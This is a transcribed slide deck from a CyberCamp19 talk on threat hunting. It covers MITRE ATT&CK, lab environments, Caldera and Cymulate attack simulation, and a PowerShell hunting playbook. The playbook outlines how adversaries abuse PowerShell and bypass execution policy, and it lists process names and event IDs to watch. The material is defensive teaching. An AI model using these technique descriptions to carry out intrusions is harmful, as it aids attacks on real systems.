Transcription
#CyberCamp19Threat Hunting ySimulación deAtaquesLórien Doménech Ruiz yCarlos Caballero García
Índice1. Threat Hunting Intro2. Vulnerabilities exploited by cybercriminals3. Configuring threat hunting environments4. Attack simulation5. Playbook and case study6. Conclusions
#CyberCamp19PonentesLórien Doménech RuizCarlos Caballero García1.
Threat Hunting Intro
Threat Hunting IntroWhere is Threat Hunting in a Incident Life Cycle?Professionals: Hackers, Sysadmins, Analysts, Incident Responders, Forensics
Threat Hunting IntroWhat is it for?
Threat Hunting IntroWhat do we need?
Threat Hunting IntroOthers resources
Vulnerabilities exploited by cybercriminals
Vulnerabilities exploited by cybercriminalsMITRE ATT&CK It’s a globally-accessible knowledge base of adversary tactics and techniques based on real-world or/enterprise
Vulnerabilities exploited by cybercriminalsCybercriminals : Lazarus Group
Vulnerabilities exploited by cybercriminalsMitre Att&ck on sandbox: Ryuk Ransomware analysis - 09/2019
Setting threat hunting environments
Threat Hunting environmentsHouse Lab with ESXiRequirements Laptops Server with ESXi VM Windows Server 2019 VM Windows 10 VM Windows 7 CentOS 7 Ubuntu S 18.04 (Caldera) Splunk Cloud (Universal Forwarder on Vm’s) Sysmon ConfigurationVPN
Threat Hunting environmentsHouse Lab with ESXiDetail requirementsCPU: 2RAM: 4GBDISK: 40GBCPU: 2RAM: 2GBDISK: 20GBCPU: 4RAM: 6GBDISK: 40GBCPU: 2RAM: 3GBDISK: 10GBCPU: Xeon 16RAM: 64GBDISK: 2TBCPU: 2RAM: 2GBDISK: 10GB
Threat Hunting environmentsSysmon ConfigurationInstall Sysmon with a configuration file to the environment. Installation: sysmon –accepteula –i c:\windows\config.xml
Threat Hunting environments
Threat Hunting environments
Threat Hunting environments
Threat Hunting environmentsDetection LabThis lab has been designed with defenders in mind. Its primary purpose is to allow theuser to quickly build a Windows domain that comes pre-loaded with security tooling andsome best practices when it comes to system logging configurationPrimary Lab Features: Microsoft Advanced Threat Analytics is installed on the WEF machine, with thelightweight ATA gateway installed on the DC Splunk forwarders are pre-installed and all indexes are pre-created. Technology addons for Windows are also preconfigured. A custom Windows auditing configuration is set via GPO to include command lineprocess auditing and additional OS-level logging Palantir's Windows Event Forwarding subscriptions and custom channels areimplemented Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs osquery comes installed on each host and is pre-configured to connect to a Fleetserver via TLS. Fleet is preconfigured with the configuration from Palantir's osqueryConfiguration Sysmon is installed and configured using SwiftOnSecurity’s open-sourced configuration All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog SMBv1 Auditing is enabledRequirements 55GB of free disk space 16GB of RAM Packer 1.3.2 or newer Vagrant 2.2.2 or newer Virtualbox or VMWare or AWSDEMO TIME!
Threat Hunting environmentsSOF-ELK VMPlatform focused on the typical needs of computer forensic investigators/analysts and information securityoperations personnel. The platform is a customized build of the open source Elastic stack, consisting of theElasticsearch storage and search engine, Logstash ingest and enrichment system, Kibana dashboard frontend, andElastic Beats log shipperRequirements 40GB of free disk space 8GB of RAM VMWare
Threat Hunting environmentsHELKHELK is one of the first open source hunt platforms. Components and structure:Requirements40GB of free disk space - 8GB of RAM - VMWare
Attack simulation
Attack simulationCalderaCALDERA is an automated adversary emulation system, built on the MITRE ATT&CK framework.Caldera 2.0 changes: the introduction of two operating modes: adversary mode (Adversary mode is the classicCALDERA capability) and chain mode (designed to allow users to orchestrate/string together atomic unit tests intolarger attack sequences).RequirementsPython 3.5.3 Google Chrome is our only supported/tested browserPluginsDEMO TIME!
Attack simulationCymulateCymulate tests the strength of the security of the companies by simulating real cyber attacks across all attackvectors based on MITRE ATT&CK .RequirementsAgent in the hostWhitelist IP
Playbook and case study
Playbook and case studyPowerShell HuntingGeneral InformationDateCreated byLast execution dateEstimated ResourcesPriority29/08/2019Lórien Doménech Ruiz09/09/2019About 24 hoursHighPowerShell ExecutionTactic: ExecutionTechnique: PowerShell (T1086)Hypothesis & TriggerHypothesisAdversaries are using PowerShell commands to attack our infrastructure to gain access to resources inside the organization.Hypothesis StatusTriggerMITRE ReferenceClassificationInitialToo many events related to suspicious PowerShell commands have been found on Siem or/and corporate Anti-Virus.PowerShell (T1086)ExecutionPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examplesinclude the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a commandlocally or on a remote computer. PowerShell may also be used to download and run executables from the Internet, which can beexecuted from disk or in memory without touching disk. Administrator permissions are required to use PowerShell to connect toremote systems.Detection of PowerShell execution locally or remotely. This only focus on execution of PowerShell and not on what happens after theexecution or the specific goal. This can be linked to several PowerShell execution variantsTechnique DescriptionTechniques Detection-Basic PowerShell ExecutionTechniques Detection-Alternate Signed PowerShell HostsDetection of the abuse of signed PowerShell Hosts bypassing application whitelisting and potentially constrained language mode.This focuses on PowerShell hosts beyond powershell.exe, powershell ise.exe or wsmprovhost.exe
Playbook and case studyThreat IntelligenceTH focus on the sectorPossible actorsPossible motivationsSoftwareActives campaign?Actor capabilityATT&CK Data SourcePowerShell logsEnergyAPT32, APT33, APT34, Dragonfly, Magic Hound, Threat Group-3390APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well aswith foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines,Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to beVietnam-based. .APT32: Cobalt Strike - commercial penetration testing tool APT32 (Last attack: February 2018, Area: East-Asian countries, References: link link2) APT32 (Initial access: spear-phishing emails, capability: High) Recommended Data SourcesEvent LogMicrosoft-Windows-Sysmon/OperationalTurn on PowerShell TranscriptionLoaded DLLsDLL monitoringWindows RegistryFile monitoringProcess monitoringProcess command-line parametersWinEventpowershell.exe, regsvr32.exe, cscript.exe, wscript.exe, Rundll32.exe
Playbook and case 5/09/2019Hunt ActionsActionResearch, get information from IT client and set the LabenvironmentSet the Lab environment and researchLooking for Event ID: 4100, 4103 and 4104Looking for Event ID: 200, 400, 500, 501 and 800Try new configuration with Sysmon to log more eventDate03/09/201904/09/201905/09/2019Hunt **************************DetailMitigationsIt may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use formany legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts.Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass)Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.Code SigningDisable or RemoveFeature or ProgramSet PowerShell execution policy to execute only signed scripts.It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, sinceit could be in use for many legitimate purposes and administrative functions. Disable/restrict the WinRM Service to help prevent uses of PowerShell forremote execution.Privileged AccountManagementWhen PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShellexecution policy, depending on environment configuration.
Playbook and case studyDate: 10/09/2019Has the hypothesis been confirmed?Final ConclusionsTime spent: 30 hours No.X Partially. Yes.Triggers another hunt? No.X Yes.Constraints or difficulties while executing? The systems doesn’t collet all PowerShell information on the logs.Hunter NotesActivity Logs?Client Info1. Explore the data produced in the lab environment with the analytics above anddocument what normal looks like from a PowerShell perspective. Then, take the findingsand explore in the production environment.2. If execution of PowerShell happens all the time in your environment, then categorize thedata collected by business unit or department to document profiles more efficiently.Partial*****Suggested Use Case*****Lab environment
Conclusions
ResourcesThreat HuntingTaHiTI y /a/a8/GOD17-Sigma.pdfDetection m/mitre/caldera
GRACIAS#CyberCamp19@loriendr@ CarlosCabal@CybercampES
This can be linked to several PowerShell execution variants . Techniques Detection . Detection of the abuse of signed PowerShell Hosts bypassing application whitelisting and potentially constrained language mode. -Alternate Signed PowerShell Hosts . This focuses on PowerShell hosts beyond powershell.exe, powershell_ise.exe or wsmprovhost.exe
